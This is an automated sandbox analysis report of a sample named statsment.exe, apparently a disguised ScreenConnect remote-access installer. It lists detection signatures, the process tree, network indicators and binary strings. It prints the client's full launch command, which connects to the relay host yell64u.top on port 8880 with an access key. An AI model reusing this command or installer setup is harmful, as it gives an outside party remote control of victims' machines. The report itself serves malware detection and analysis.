Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
statsment.exe

Overview

General Information

Sample name:statsment.exe
Analysis ID:1574188
MD5:321132051c3add66f0cdae4b8cf4c332
SHA1:8513ae78b78f157fdd8800f2eda654c75332cd4b
SHA256:d19dbc6b0c0792df8f420c14ef25130052a81d481d38340a40194862ff0095cd
Tags:exeuser-malwarology
Infos:

Detection

ScreenConnect Tool
Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:32
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • statsment.exe (PID: 7676 cmdline: "C:\Users\user\Desktop\statsment.exe" MD5: 321132051C3ADD66F0CDAE4B8CF4C332)
    • msiexec.exe (PID: 7736 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7768 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7824 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 8184DE85A5CB7E60E4BEE8460840EE70 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 7872 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSICAFF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5884812 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 7960 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding DF919848E655E7C7ACF0240BA4C9A705 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 8004 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6E13845DE42F2DC1013E1DB414C7336A E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 8044 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=882825b1-a7d4-4898-8af4-0ecb567917da&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Groups&c=&c=&c=&c=&c=&c=&c=" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 8112 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "0cb4bca7-7067-4861-8f9f-7ae40c9c0413" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
    • ScreenConnect.WindowsClient.exe (PID: 7344 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "b789ee53-da8d-4b10-9490-36f6b234bd89" "System" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
statsment.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Config.Msi\59d159.rbsJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Windows\Installer\MSID418.tmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          SourceRuleDescriptionAuthorStrings
          00000000.00000002.1716747544.0000000005430000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            00000008.00000000.1750694903.0000000000AD2000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              00000008.00000002.2960693212.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                00000000.00000000.1684869140.0000000000256000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  00000009.00000002.1800818795.00000000029B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    Click to see the 5 entries
                    SourceRuleDescriptionAuthorStrings
                    0.2.statsment.exe.5430000.9.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      8.0.ScreenConnect.WindowsClient.exe.ad0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                        8.2.ScreenConnect.WindowsClient.exe.2e4fa20.0.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                          0.2.statsment.exe.5430000.9.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                            0.0.statsment.exe.305db8.5.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                              Click to see the 4 entries

                              System Summary

                              barindex
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=882825b1-a7d4-4898-8af4-0ecb567917da&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Groups&c=&c=&c=&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=882825b1-a7d4-4898-8af4-0ecb567917da&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Groups&c=&c=&c=&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=882825b1-a7d4-4898-8af4-0ecb567917da&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Groups&c=&c=&c=&c=&c=&c=&c=", ProcessId: 8044, ProcessName: ScreenConnect.ClientService.exe
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (de5851ad6e374ce3) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 7768, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-406F-012C01771397}\(Default)
                              No Suricata rule has matched

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: statsment.exeVirustotal: Detection: 27%Perma Link
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.4% probability
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_05E3238C CryptUnprotectData,7_2_05E3238C
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_05E33090 CryptUnprotectData,7_2_05E33090
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_05E32381 CryptUnprotectData,7_2_05E32381
                              Source: C:\Users\user\Desktop\statsment.exeEXE: msiexec.exeJump to behavior

                              Compliance

                              barindex
                              Source: C:\Users\user\Desktop\statsment.exeEXE: msiexec.exeJump to behavior
                              Source: statsment.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: statsment.exeStatic PE information: certificate valid
                              Source: statsment.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800218689.0000000000F22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1750694903.0000000000AD2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: statsment.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: statsment.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: statsment.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.2983468766.0000000002B77000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1806553609.00000000129C0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: statsment.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.2960693212.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800566476.0000000002942000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800109630.0000000000EE0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800818795.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: statsment.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1735043722.000000000041D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: statsment.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000004.00000003.1711832278.0000000004C2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1714393742.00000000049B0000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000004.00000003.1711832278.0000000004BBB000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: statsment.exe, 59d159.rbs.2.dr, 59d15a.msi.2.dr, MSID438.tmp.2.dr, 59d158.msi.2.dr, MSID418.tmp.2.dr, MSID756.tmp.2.dr, setup.msi.0.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.2983468766.0000000002B77000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1806553609.00000000129C0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1750694903.0000000000AD2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: statsment.exe, 59d15a.msi.2.dr, 59d158.msi.2.dr, MSICAFF.tmp.1.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: statsment.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800218689.0000000000F22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000007.00000002.2983468766.0000000002B77000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1806553609.00000000129C0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: statsment.exe
                              Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

                              Networking

                              barindex
                              Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL ServiceJump to behavior
                              Source: global trafficTCP traffic: 192.168.2.4:49731 -> 85.239.34.190:8880
                              Source: Joe Sandbox ViewASN Name: RAINBOW-HKRainbownetworklimitedHK RAINBOW-HKRainbownetworklimitedHK
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: yell64u.top
                              Source: statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1806553609.00000000129C0000.00000004.00000800.00020000.00000000.sdmp, statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                              Source: statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                              Source: statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                              Source: statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                              Source: statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                              Source: ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1806553609.00000000129C0000.00000004.00000800.00020000.00000000.sdmp, statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                              Source: statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0
                              Source: statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0A
                              Source: statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
                              Source: statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0X
                              Source: ScreenConnect.ClientService.exe, 00000007.00000002.2963863424.0000000001D5A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800818795.00000000029B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: rundll32.exe, 00000004.00000003.1711832278.0000000004BBB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1712025636.00000000049B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1711832278.0000000004C2A000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                              Source: rundll32.exe, 00000004.00000003.1711832278.0000000004BBB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1712025636.00000000049B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1711832278.0000000004C2A000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drString found in binary or memory: http://wixtoolset.org/news/
                              Source: rundll32.exe, 00000004.00000003.1711832278.0000000004BBB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1712025636.00000000049B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1711832278.0000000004C2A000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drString found in binary or memory: http://wixtoolset.org/releases/
